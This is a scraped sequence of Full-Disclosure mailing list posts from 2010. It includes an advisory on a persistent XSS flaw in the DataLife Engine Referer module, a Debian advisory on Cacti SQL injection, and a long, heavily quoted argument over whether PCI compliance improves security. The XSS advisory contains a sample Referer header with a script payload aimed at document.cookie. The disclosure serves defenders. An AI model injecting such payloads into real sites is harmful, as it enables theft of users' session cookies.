Hello Full-Disclosure! I want to warn you about security vulnerability in Referer module for DataLife Engine (DLE). - Advisory: Vulnerability in Referer for DataLife Engine - URL: http://websecurity.com.ua/3942/ - Affected products: Referer (aka Perehody on Russian) v.6.9 and previous versions. - Timeline: 29.06.2009 - found vulnerability. 11.02.2010 - announced at my site. 13.02.2010 - informed admin of web site where I found the vulnerability. 15.02.2010 - informed developers of DataLife Engine (at first I thought that hole existed in DLE, and admin of vulnerable web site didn't answer me and didn't fix the hole, but DLE developers said that hole is not in their engine and they didn't know what the module it is). 19.02.2010 - informed developers of the module (after I found that it's Referer module). 23.04.2010 - disclosed at my site. - Details: This is Cross-Site Scripting vulnerability. XSS: It's persistent XSS vulnerability. Which allows to conduct the attack via Referer header, in case when immediate links to queries in search engines are showing at the site. Referer: http://www.google.com/search?q=xss;scriptalert(document.cookie)/script Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] We must work harder on cloud, says Microsoft
On Wed, Apr 21, 2010 at 07:43:36PM -0400, Jason Nada wrote: The funny thing about the cloud is that eventually there is going to be a monopoly of one company that dominates in it. Just as Microsoft has done with software, I can see Microsoft CloudSoft coming soon. and when the cloud gets 0wned, the botnet market will restructure. cest la vie ;) m$, we need more dancing monkeys and more cake-faced mentally ill people at higher positions, please help... -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
You don't think in-house payment gateways can be as stable as third party gateways? Probably not .. it goes back to the how many '9s' can you afford to pay for question. But in-house has the advantage of knowing who to yell at when it breaks. Management generally prefers to yell locally instead of being told I dunno, ask the cloud. Cheers, Michael Holstein Cleveland State University ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2039-1] New cacti packages fix missing input sanitising
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-2039-1 secur...@debian.org http://www.debian.org/security/ Thijs Kinkhorst April 23, 2010http://www.debian.org/security/faq - Package: cacti Vulnerability : missing input sanitising Problem type : remote Debian-specific: no Debian Bug : 578909 It was discovered that Cacti, a frontend to rrdtool for monitoring systems and services missed input sanitising, making an SQL injection attack possible. For the stable distribution (lenny), this problem has been fixed in version 0.8.7b-2.1+lenny2. For the unstable distribution (sid), this problem will be fixed soon. We recommend that you upgrade your cacti package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - Source archives: http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny2.diff.gz Size/MD5 checksum:37338 16b43e80a447a185f5372372836104ed http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b.orig.tar.gz Size/MD5 checksum: 1972444 aa8a740a6ab88e3634b546c3e1bc502f http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny2.dsc Size/MD5 checksum: 1408 468d418ebedfd326081cbb159c159b55 Architecture independent packages: http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny2_all.deb Size/MD5 checksum: 1826020 b88356b2559091ae8444b93b5234e881 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-annou...@lists.debian.org Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iQEcBAEBAgAGBQJL0fvtAAoJECIIoQCMVaAceK0H/jud0EGRDRnk4Lwd2Io8JyTr mJmuYrVrSKa4DnDd4y62xShPqKUvc9Fs4mbQb4an8aNinyTR9m6CSqF5qs1T6oAt zcvSNdDetj3H/wqJ24T3oUpCadNu7FNUBPj0VLjqZL4G7NuHqxoyvPEkDyYBjIUB abqgJWsG7RXiuGbNPsCRzcp2AASaTH4iQ2GELCsZ50TQxW+1v+GHneqjAwSHYI4n cPO+SumkZ5k6oPEwzKpQm9ja3e3rz/kb7SogDVexCeH7sBZG2N2fo6OCv8T8PvpW zYy2pGmZXvtSAu/zeBBXvdox7byfAchKQFRRbZRYhUVODYn5/iFAV8FoGmqXbkE= =0ixH -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
If you strive for security, and weave that into your network, complying with PCI should be cake. Uhm.. No. NO. PCI is an unnecessary hassle. What makes signing a document any more secure then having server facing the wild of the net? Truth is, PCI doesn't help in security at all. It at most a sense of false security (and at least serves as a recreational exercise for auditors). Thor, I'm not arguing with the article, since I didn't read it, and I won't bother to. I just want to point out some hard facts about PCI/DSS which you call no big deal. I surely agree with that, but what is not a big deal for you doesn't mean it ain't for the rest of the world. What stops an uninformed programmer from complying with PCI/DSS (or at least, think to) and leave RFI/XSS/whatever holes everywhere? That said, security flaws are just about everywhere so no need to get critical about it. For now at least. The point isn't who should be using credit cards or not, it's a matter of security. I find it strange that you're excusing marketing propaganda. Sincere regards, Christian Sciberras. On Fri, Apr 23, 2010 at 7:42 PM, Mike Hale eyeronic.des...@gmail.comwrote: Look at the PCI requirements. What's unreasonable about them? Which portions are *NOT* part of having a secure network? If you strive for security, and weave that into your network, complying with PCI should be cake. On Fri, Apr 23, 2010 at 10:40 AM, Stephen Mullins steve.mullins.w...@gmail.com wrote: I don't see what the hubbub is Some people in the information security industry actually care about securing systems and the information they contain rather than filling in check boxes. Compliance may ensure a minimum standard is met, but it does not ensure or imply that real security is being maintained at an organization. As you say, PCI has become a cost of doing business whereas having a secure network is apparently not a cost of doing business. This is a problem. Crazy notion, I know. On Fri, Apr 23, 2010 at 1:18 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: How can you say it is “wasted”? It doesn’t matter if you are a “fan” of it or not, in the same way that it doesn’t matter if you are a “fan” of the 4% surcharge retail establishments pay to accept the credit card as payment. Using your logic, you would way it is “wasted money,” and might bring into question the “value” of the surcharge, etc. It is simply a cost of doing business. If you choose to offload processing to a payment gateway, then that will also incur a cost. Depending on your volume, that cost may or may not be higher than you processing them yourself while complying to standards. The implementation of actual security measures will be different. But you can’t “handle” credit cards in the classic sense of the word without complying with PCI. If you pass along the transaction to a gateway, you are not handling it. If you DO handle it, then you have to comply with PCI. If you process less than 1 million transactions a year, you can “self audit.” If you process more, you have to be audit by a PCI auditor. None of this MEANS you are secure, it means you comply. If you don’t like PCI, then don’t process credit cards, or come up with your own. I still don’t really see what all the hubbub is about here. t From: Christian Sciberras [mailto:uuf6...@gmail.com] Sent: Friday, April 23, 2010 9:29 AM To: Thor (Hammer of God) Cc: Christopher Gilbert; Mike Hale; full-disclosure; security-bas...@securityfocus.com Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds it is simply part of the cost of doing business in that market. A.k.a. wasted money. Truth be told, I'm no fan of PCI. Other companies get the same functionality (accept the storage of credit cards) without worrying about PCI/DSS (e.g. through Payment Gateways). In the end, as a service, what do I want, an inventory of credit cards, or a stable payment system? The later I guess. As to security, it totally depends on implementation; one can handle credit cards without the need of standards compliance. My two cents. Regards, Christian Sciberras. On Fri, Apr 23, 2010 at 6:07 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: Another thing that I think people fail to keep in mind is that when it comes to PCI, it is part of a contractual agreement between the entity and card facility they are working with. If a business wants to accept credit cards as a means of payment (based on volume) then part of their agreement is that they must undergo compliance to a standard implemented by the industry. I don’t know why people get all emotional about it and throw up their hands with all the “this is wasted money” positioning – it’s not wasted at all; it is simply part of the cost of doing business in that market. t
Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
Marketing propaganda? I have no idea what you are talking about. Before commenting on PCI not helping at all and at the most being a false sense of security, let me ask: 1) Does the company you work for perform PCI audits? 2) Is the company you work for required to undergo PCI audits? 3) Are you certified to be able to perform a PCI audit? 4) Have you ever been directly involved with, as in contributing to, a PCI audit, and if so, in what capacity? I would like to see some truthful expansion on the answers to those questions before continuing dialog about if PCI contributes to security or not. t From: Christian Sciberras [mailto:uuf6...@gmail.com] Sent: Friday, April 23, 2010 3:02 PM To: Mike Hale Cc: Stephen Mullins; full-disclosure; security-bas...@securityfocus.com; Thor (Hammer of God) Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds If you strive for security, and weave that into your network, complying with PCI should be cake. Uhm.. No. NO. PCI is an unnecessary hassle. What makes signing a document any more secure then having server facing the wild of the net? Truth is, PCI doesn't help in security at all. It at most a sense of false security (and at least serves as a recreational exercise for auditors). Thor, I'm not arguing with the article, since I didn't read it, and I won't bother to. I just want to point out some hard facts about PCI/DSS which you call no big deal. I surely agree with that, but what is not a big deal for you doesn't mean it ain't for the rest of the world. What stops an uninformed programmer from complying with PCI/DSS (or at least, think to) and leave RFI/XSS/whatever holes everywhere? That said, security flaws are just about everywhere so no need to get critical about it. For now at least. The point isn't who should be using credit cards or not, it's a matter of security. I find it strange that you're excusing marketing propaganda. Sincere regards, Christian Sciberras. On Fri, Apr 23, 2010 at 7:42 PM, Mike Hale eyeronic.des...@gmail.commailto:eyeronic.des...@gmail.com wrote: Look at the PCI requirements. What's unreasonable about them? Which portions are *NOT* part of having a secure network? If you strive for security, and weave that into your network, complying with PCI should be cake. On Fri, Apr 23, 2010 at 10:40 AM, Stephen Mullins steve.mullins.w...@gmail.commailto:steve.mullins.w...@gmail.com wrote: I don't see what the hubbub is Some people in the information security industry actually care about securing systems and the information they contain rather than filling in check boxes. Compliance may ensure a minimum standard is met, but it does not ensure or imply that real security is being maintained at an organization. As you say, PCI has become a cost of doing business whereas having a secure network is apparently not a cost of doing business. This is a problem. Crazy notion, I know. On Fri, Apr 23, 2010 at 1:18 PM, Thor (Hammer of God) t...@hammerofgod.commailto:t...@hammerofgod.com wrote: How can you say it is wasted? It doesn't matter if you are a fan of it or not, in the same way that it doesn't matter if you are a fan of the 4% surcharge retail establishments pay to accept the credit card as payment. Using your logic, you would way it is wasted money, and might bring into question the value of the surcharge, etc. It is simply a cost of doing business. If you choose to offload processing to a payment gateway, then that will also incur a cost. Depending on your volume, that cost may or may not be higher than you processing them yourself while complying to standards. The implementation of actual security measures will be different. But you can't handle credit cards in the classic sense of the word without complying with PCI. If you pass along the transaction to a gateway, you are not handling it. If you DO handle it, then you have to comply with PCI. If you process less than 1 million transactions a year, you can self audit. If you process more, you have to be audit by a PCI auditor. None of this MEANS you are secure, it means you comply. If you don't like PCI, then don't process credit cards, or come up with your own. I still don't really see what all the hubbub is about here. t From: Christian Sciberras [mailto:uuf6...@gmail.commailto:uuf6...@gmail.com] Sent: Friday, April 23, 2010 9:29 AM To: Thor (Hammer of God) Cc: Christopher Gilbert; Mike Hale; full-disclosure; security-bas...@securityfocus.commailto:security-bas...@securityfocus.com Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds it is simply part of the cost of doing business in that market. A.k.a. wasted money. Truth be told, I'm no fan of PCI. Other companies get the same functionality (accept the storage of credit cards) without worrying about PCI/DSS (e.g. through Payment Gateways). In the end, as a service, what do I want, an
Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
No problem with that. 1) No. 2) Planning to, but no. 3) Heavens no. 4) I've looked into whether it was into our best interest to use PCI. (it was decided that it wasn't worth the trouble) At that time, I knew about PCI but not its details, at which point we got someone to explain in detail for us. The end decision wasn't mine, though. We do take security as a main concern, however, it is preferred to have a more realistic approach to security rather then restrict employees' access (by signing some oath..). Regards, Christian Sciberras. On Sat, Apr 24, 2010 at 12:22 AM, Thor (Hammer of God) t...@hammerofgod.com wrote: Marketing propaganda? I have no idea what you are talking about. Before commenting on PCI not helping at all and at the most being a false sense of security, let me ask: 1) Does the company you work for perform PCI audits? 2) Is the company you work for required to undergo PCI audits? 3) Are you certified to be able to perform a PCI audit? 4) Have you ever been directly involved with, as in contributing to, a PCI audit, and if so, in what capacity? I would like to see some truthful expansion on the answers to those questions before continuing dialog about if PCI contributes to security or not. t *From:* Christian Sciberras [mailto:uuf6...@gmail.com] *Sent:* Friday, April 23, 2010 3:02 PM *To:* Mike Hale *Cc:* Stephen Mullins; full-disclosure; security-bas...@securityfocus.com; Thor (Hammer of God) *Subject:* Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds If you strive for security, and weave that into your network, complying with PCI should be cake. Uhm.. No. NO. PCI is an unnecessary hassle. What makes signing a document any more secure then having server facing the wild of the net? Truth is, PCI doesn't help in security at all. It at most a sense of false security (and at least serves as a recreational exercise for auditors). Thor, I'm not arguing with the article, since I didn't read it, and I won't bother to. I just want to point out some hard facts about PCI/DSS which you call no big deal. I surely agree with that, but what is not a big deal for you doesn't mean it ain't for the rest of the world. What stops an uninformed programmer from complying with PCI/DSS (or at least, think to) and leave RFI/XSS/whatever holes everywhere? That said, security flaws are just about everywhere so no need to get critical about it. For now at least. The point isn't who should be using credit cards or not, it's a matter of security. I find it strange that you're excusing marketing propaganda. Sincere regards, Christian Sciberras. On Fri, Apr 23, 2010 at 7:42 PM, Mike Hale eyeronic.des...@gmail.com wrote: Look at the PCI requirements. What's unreasonable about them? Which portions are *NOT* part of having a secure network? If you strive for security, and weave that into your network, complying with PCI should be cake. On Fri, Apr 23, 2010 at 10:40 AM, Stephen Mullins steve.mullins.w...@gmail.com wrote: I don't see what the hubbub is Some people in the information security industry actually care about securing systems and the information they contain rather than filling in check boxes. Compliance may ensure a minimum standard is met, but it does not ensure or imply that real security is being maintained at an organization. As you say, PCI has become a cost of doing business whereas having a secure network is apparently not a cost of doing business. This is a problem. Crazy notion, I know. On Fri, Apr 23, 2010 at 1:18 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: How can you say it is “wasted”? It doesn’t matter if you are a “fan” of it or not, in the same way that it doesn’t matter if you are a “fan” of the 4% surcharge retail establishments pay to accept the credit card as payment. Using your logic, you would way it is “wasted money,” and might bring into question the “value” of the surcharge, etc. It is simply a cost of doing business. If you choose to offload processing to a payment gateway, then that will also incur a cost. Depending on your volume, that cost may or may not be higher than you processing them yourself while complying to standards. The implementation of actual security measures will be different. But you can’t “handle” credit cards in the classic sense of the word without complying with PCI. If you pass along the transaction to a gateway, you are not handling it. If you DO handle it, then you have to comply with PCI. If you process less than 1 million transactions a year, you can “self audit.” If you process more, you have to be audit by a PCI auditor. None of this MEANS you are secure, it means you comply. If you don’t like PCI, then don’t process credit cards, or come up with your own. I still don’t really see what all the hubbub is about here. t
Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
Sorry, forgot to reply to your quoting me about false sense of security. Let me explain myself. It is relatively easier to forget real security concerns (such as [really] bad coding) when one follows a checklist for high security (quoting pcisecuritystandards.org). Unless I missed something (which I don't think I did) PCI/DSS doesn't help at all since it is putting security methodologies over your project manager's desk, rather then get a IT Security specialist do the job. Cheers. On Sat, Apr 24, 2010 at 12:33 AM, Christian Sciberras uuf6...@gmail.comwrote: No problem with that. 1) No. 2) Planning to, but no. 3) Heavens no. 4) I've looked into whether it was into our best interest to use PCI. (it was decided that it wasn't worth the trouble) At that time, I knew about PCI but not its details, at which point we got someone to explain in detail for us. The end decision wasn't mine, though. We do take security as a main concern, however, it is preferred to have a more realistic approach to security rather then restrict employees' access (by signing some oath..). Regards, Christian Sciberras. On Sat, Apr 24, 2010 at 12:22 AM, Thor (Hammer of God) t...@hammerofgod.com wrote: Marketing propaganda? I have no idea what you are talking about. Before commenting on PCI not helping at all and at the most being a false sense of security, let me ask: 1) Does the company you work for perform PCI audits? 2) Is the company you work for required to undergo PCI audits? 3) Are you certified to be able to perform a PCI audit? 4) Have you ever been directly involved with, as in contributing to, a PCI audit, and if so, in what capacity? I would like to see some truthful expansion on the answers to those questions before continuing dialog about if PCI contributes to security or not. t *From:* Christian Sciberras [mailto:uuf6...@gmail.com] *Sent:* Friday, April 23, 2010 3:02 PM *To:* Mike Hale *Cc:* Stephen Mullins; full-disclosure; security-bas...@securityfocus.com; Thor (Hammer of God) *Subject:* Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds If you strive for security, and weave that into your network, complying with PCI should be cake. Uhm.. No. NO. PCI is an unnecessary hassle. What makes signing a document any more secure then having server facing the wild of the net? Truth is, PCI doesn't help in security at all. It at most a sense of false security (and at least serves as a recreational exercise for auditors). Thor, I'm not arguing with the article, since I didn't read it, and I won't bother to. I just want to point out some hard facts about PCI/DSS which you call no big deal. I surely agree with that, but what is not a big deal for you doesn't mean it ain't for the rest of the world. What stops an uninformed programmer from complying with PCI/DSS (or at least, think to) and leave RFI/XSS/whatever holes everywhere? That said, security flaws are just about everywhere so no need to get critical about it. For now at least. The point isn't who should be using credit cards or not, it's a matter of security. I find it strange that you're excusing marketing propaganda. Sincere regards, Christian Sciberras. On Fri, Apr 23, 2010 at 7:42 PM, Mike Hale eyeronic.des...@gmail.com wrote: Look at the PCI requirements. What's unreasonable about them? Which portions are *NOT* part of having a secure network? If you strive for security, and weave that into your network, complying with PCI should be cake. On Fri, Apr 23, 2010 at 10:40 AM, Stephen Mullins steve.mullins.w...@gmail.com wrote: I don't see what the hubbub is Some people in the information security industry actually care about securing systems and the information they contain rather than filling in check boxes. Compliance may ensure a minimum standard is met, but it does not ensure or imply that real security is being maintained at an organization. As you say, PCI has become a cost of doing business whereas having a secure network is apparently not a cost of doing business. This is a problem. Crazy notion, I know. On Fri, Apr 23, 2010 at 1:18 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: How can you say it is “wasted”? It doesn’t matter if you are a “fan” of it or not, in the same way that it doesn’t matter if you are a “fan” of the 4% surcharge retail establishments pay to accept the credit card as payment. Using your logic, you would way it is “wasted money,” and might bring into question the “value” of the surcharge, etc. It is simply a cost of doing business. If you choose to offload processing to a payment gateway, then that will also incur a cost. Depending on your volume, that cost may or may not be higher than you processing them yourself while complying to standards. The implementation of actual security measures will be different. But you can’t
Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
OK - so, when you say to use PCI what do you mean? I get the feeling that you are equating being PCI certified as something people just get to show other people they are secure. Hence your use of marketing propaganda. People don't go through an audit and get PCI certified so that they can claim they are secure. It doesn't work like that. PCI (Payment Card Industry) compliances is what people HAVE to do, as in FORCED to do whether they want to or not, in order to be able to process credit cards. If you process less than 1 million xactions per year, you can self audit. Can you lie? Sure. But you'll get your ability to process payments yanked if they catch you. More than that requires an auditor. If that auditor finds you have horrible security controls in place, you will fail. If they pass you anyway, they can lose their certification to audit. If you fail, you have x time to get with the program and be audited again. It's just a way for the CC industry to make sure the people handling card info follow best practices for security. That's all it means - it is a certification FOR the industry BY the industry. No one ever said it mean people had real security. It means companies illustrate a base of practices required to handle consumer credit card data. That's it. And I totally agree with Mike Hale's comments about if you are really secure, as in 'already secure' then it's cake. I don't know that I would say cake as it depends on the scope of audit, but he's right. If you already have a drive to secure your infrastructure, then PCI should be easy. My requirements for security are far more strict than PCI. Yours may or may not be, so you'll have to adjust as necessary. Regarding code, I do believe that in PCI audits for dev that you have to illustrate an SDL, in which case things like XSS and BOs and such would be part of. That's the skinny on PCI :) t From: Christian Sciberras [mailto:uuf6...@gmail.com] Sent: Friday, April 23, 2010 3:34 PM To: Thor (Hammer of God) Cc: Mike Hale; Stephen Mullins; full-disclosure; security-bas...@securityfocus.com Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds No problem with that. 1) No. 2) Planning to, but no. 3) Heavens no. 4) I've looked into whether it was into our best interest to use PCI. (it was decided that it wasn't worth the trouble) At that time, I knew about PCI but not its details, at which point we got someone to explain in detail for us. The end decision wasn't mine, though. We do take security as a main concern, however, it is preferred to have a more realistic approach to security rather then restrict employees' access (by signing some oath..). Regards, Christian Sciberras. On Sat, Apr 24, 2010 at 12:22 AM, Thor (Hammer of God) t...@hammerofgod.commailto:t...@hammerofgod.com wrote: Marketing propaganda? I have no idea what you are talking about. Before commenting on PCI not helping at all and at the most being a false sense of security, let me ask: 1) Does the company you work for perform PCI audits? 2) Is the company you work for required to undergo PCI audits? 3) Are you certified to be able to perform a PCI audit? 4) Have you ever been directly involved with, as in contributing to, a PCI audit, and if so, in what capacity? I would like to see some truthful expansion on the answers to those questions before continuing dialog about if PCI contributes to security or not. t From: Christian Sciberras [mailto:uuf6...@gmail.commailto:uuf6...@gmail.com] Sent: Friday, April 23, 2010 3:02 PM To: Mike Hale Cc: Stephen Mullins; full-disclosure; security-bas...@securityfocus.commailto:security-bas...@securityfocus.com; Thor (Hammer of God) Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds If you strive for security, and weave that into your network, complying with PCI should be cake. Uhm.. No. NO. PCI is an unnecessary hassle. What makes signing a document any more secure then having server facing the wild of the net? Truth is, PCI doesn't help in security at all. It at most a sense of false security (and at least serves as a recreational exercise for auditors). Thor, I'm not arguing with the article, since I didn't read it, and I won't bother to. I just want to point out some hard facts about PCI/DSS which you call no big deal. I surely agree with that, but what is not a big deal for you doesn't mean it ain't for the rest of the world. What stops an uninformed programmer from complying with PCI/DSS (or at least, think to) and leave RFI/XSS/whatever holes everywhere? That said, security flaws are just about everywhere so no need to get critical about it. For now at least. The point isn't who should be using credit cards or not, it's a matter of security. I find it strange that you're excusing marketing propaganda. Sincere regards, Christian Sciberras. On Fri, Apr 23, 2010 at 7:42 PM, Mike Hale
Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
On Fri, Apr 23, 2010 at 3:33 PM, Christian Sciberras uuf6...@gmail.com wrote: 4) I've looked into whether it was into our best interest to use PCI. (it was decided that it wasn't worth the trouble) At that time, I knew about PCI but not its details, at which point we got someone to explain in detail for us. This right here screams bullshitter. It isn't as if you get to decide if you want to use PCI or not. If you process credit cards with the major card brands you are going to do PCI either now or eventually. There is no other security standard which you can choose. You also show signs of being a victim of absolutism. Nobody has ever claimed that PCI makes you secure. It is a minimal standard which experience has shown most companies need spelled out for them. There is much more than just the things spelled out by PCI that need to be done. As usual in these situations, your real complaint isn't about PCI but about the people who just don't get the point. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
I just want to emphasize on a point you mentioned right now: It means companies illustrate a *base* of practices required to handle consumer credit card data. So why waste resources, time and money when one would be better off with proper security measures? As Mr Hale said, it's a piece of cake if you had the right stuff already going. Problem is, it's a piece of expensive cake. I just want[ed] to make my point clear, I don't see any discussion into this at all. As I already said, it is not my intention to argue with the original message. Cheers. On Sat, Apr 24, 2010 at 12:46 AM, Thor (Hammer of God) t...@hammerofgod.com wrote: OK – so, when you say “to use PCI” what do you mean? I get the feeling that you are equating being “PCI certified” as something people just “get” to show other people they are “secure.” Hence your use of “marketing propaganda.” People don’t go through an audit and get PCI certified so that they can claim they are secure. It doesn’t work like that. PCI (Payment Card Industry) compliances is what people HAVE to do, as in FORCED to do whether they want to or not, in order to be able to process credit cards. If you process less than 1 million xactions per year, you can “self audit.” Can you lie? Sure. But you’ll get your ability to process payments yanked if they catch you. More than that requires an auditor. If that auditor finds you have horrible security controls in place, you will fail. If they pass you anyway, they can lose their certification to audit. If you fail, you have x time to get with the program and be audited again. It’s just a way for the CC industry to make sure the people handling card info follow best practices for security. That’s all it means – it is a certification FOR the industry BY the industry. No one ever said it mean people had “real security.” It means companies illustrate a base of practices required to handle consumer credit card data. That’s it. And I totally agree with Mike Hale’s comments about “if you are really secure, as in ‘already secure’ then it’s cake.” I don’t know that I would say “cake” as it depends on the scope of audit, but he’s right. If you already have a drive to secure your infrastructure, then PCI should be easy. My requirements for security are far more strict than PCI. Yours may or may not be, so you’ll have to adjust as necessary. Regarding code, I do believe that in PCI audits for dev that you have to illustrate an SDL, in which case things like XSS and BOs and such would be part of. That’s the skinny on PCI J t *From:* Christian Sciberras [mailto:uuf6...@gmail.com] *Sent:* Friday, April 23, 2010 3:34 PM *To:* Thor (Hammer of God) *Cc:* Mike Hale; Stephen Mullins; full-disclosure; security-bas...@securityfocus.com *Subject:* Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds No problem with that. 1) No. 2) Planning to, but no. 3) Heavens no. 4) I've looked into whether it was into our best interest to use PCI. (it was decided that it wasn't worth the trouble) At that time, I knew about PCI but not its details, at which point we got someone to explain in detail for us. The end decision wasn't mine, though. We do take security as a main concern, however, it is preferred to have a more realistic approach to security rather then restrict employees' access (by signing some oath..). Regards, Christian Sciberras. On Sat, Apr 24, 2010 at 12:22 AM, Thor (Hammer of God) t...@hammerofgod.com wrote: Marketing propaganda? I have no idea what you are talking about. Before commenting on PCI not helping at all and at the most being a false sense of security, let me ask: 1) Does the company you work for perform PCI audits? 2) Is the company you work for required to undergo PCI audits? 3) Are you certified to be able to perform a PCI audit? 4) Have you ever been directly involved with, as in contributing to, a PCI audit, and if so, in what capacity? I would like to see some truthful expansion on the answers to those questions before continuing dialog about if PCI contributes to security or not. t *From:* Christian Sciberras [mailto:uuf6...@gmail.com] *Sent:* Friday, April 23, 2010 3:02 PM *To:* Mike Hale *Cc:* Stephen Mullins; full-disclosure; security-bas...@securityfocus.com; Thor (Hammer of God) *Subject:* Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds If you strive for security, and weave that into your network, complying with PCI should be cake. Uhm.. No. NO. PCI is an unnecessary hassle. What makes signing a document any more secure then having server facing the wild of the net? Truth is, PCI doesn't help in security at all. It at most a sense of false security (and at least serves as a recreational exercise for auditors). Thor, I'm not arguing with the article, since I didn't read it, and I won't bother to. I just want to point out
Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
Payment Gateways are a nice alternative to processing credit cards yourself. Well, as nice as it gets... Other then that, it's not me that is being absolutist, but rather seeing this from a company perspective. Nobody has ever claimed that PCI makes you secure. Interesting statement. Why's the need for PCI then? (don't bother with an answer) It is a minimal standard which experience has shown most companies need spelled out for them. Exactly. So where was the security again? On Sat, Apr 24, 2010 at 12:56 AM, BMF badmotherfs...@gmail.com wrote: On Fri, Apr 23, 2010 at 3:33 PM, Christian Sciberras uuf6...@gmail.com wrote: 4) I've looked into whether it was into our best interest to use PCI. (it was decided that it wasn't worth the trouble) At that time, I knew about PCI but not its details, at which point we got someone to explain in detail for us. This right here screams bullshitter. It isn't as if you get to decide if you want to use PCI or not. If you process credit cards with the major card brands you are going to do PCI either now or eventually. There is no other security standard which you can choose. You also show signs of being a victim of absolutism. Nobody has ever claimed that PCI makes you secure. It is a minimal standard which experience has shown most companies need spelled out for them. There is much more than just the things spelled out by PCI that need to be done. As usual in these situations, your real complaint isn't about PCI but about the people who just don't get the point. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
You spend the time, resources, and money because you are contracted to. You are required to. You HAVE to. That's what we've all been getting on about - you don't get to choose, you have to if you want to continue to process credit card information yourself. If you want to use a gateway service or other processor, then fine - do that. No harm, no foul. You just pay more. If you want to do yourself, you have to be PCI certified. It's just that simple. t From: Christian Sciberras [mailto:uuf6...@gmail.com] Sent: Friday, April 23, 2010 3:57 PM To: Thor (Hammer of God) Cc: Mike Hale; Stephen Mullins; full-disclosure; security-bas...@securityfocus.com Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds I just want to emphasize on a point you mentioned right now: It means companies illustrate a base of practices required to handle consumer credit card data. So why waste resources, time and money when one would be better off with proper security measures? As Mr Hale said, it's a piece of cake if you had the right stuff already going. Problem is, it's a piece of expensive cake. I just want[ed] to make my point clear, I don't see any discussion into this at all. As I already said, it is not my intention to argue with the original message. Cheers. On Sat, Apr 24, 2010 at 12:46 AM, Thor (Hammer of God) t...@hammerofgod.commailto:t...@hammerofgod.com wrote: OK - so, when you say to use PCI what do you mean? I get the feeling that you are equating being PCI certified as something people just get to show other people they are secure. Hence your use of marketing propaganda. People don't go through an audit and get PCI certified so that they can claim they are secure. It doesn't work like that. PCI (Payment Card Industry) compliances is what people HAVE to do, as in FORCED to do whether they want to or not, in order to be able to process credit cards. If you process less than 1 million xactions per year, you can self audit. Can you lie? Sure. But you'll get your ability to process payments yanked if they catch you. More than that requires an auditor. If that auditor finds you have horrible security controls in place, you will fail. If they pass you anyway, they can lose their certification to audit. If you fail, you have x time to get with the program and be audited again. It's just a way for the CC industry to make sure the people handling card info follow best practices for security. That's all it means - it is a certification FOR the industry BY the industry. No one ever said it mean people had real security. It means companies illustrate a base of practices required to handle consumer credit card data. That's it. And I totally agree with Mike Hale's comments about if you are really secure, as in 'already secure' then it's cake. I don't know that I would say cake as it depends on the scope of audit, but he's right. If you already have a drive to secure your infrastructure, then PCI should be easy. My requirements for security are far more strict than PCI. Yours may or may not be, so you'll have to adjust as necessary. Regarding code, I do believe that in PCI audits for dev that you have to illustrate an SDL, in which case things like XSS and BOs and such would be part of. That's the skinny on PCI :) t From: Christian Sciberras [mailto:uuf6...@gmail.commailto:uuf6...@gmail.com] Sent: Friday, April 23, 2010 3:34 PM To: Thor (Hammer of God) Cc: Mike Hale; Stephen Mullins; full-disclosure; security-bas...@securityfocus.commailto:security-bas...@securityfocus.com Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds No problem with that. 1) No. 2) Planning to, but no. 3) Heavens no. 4) I've looked 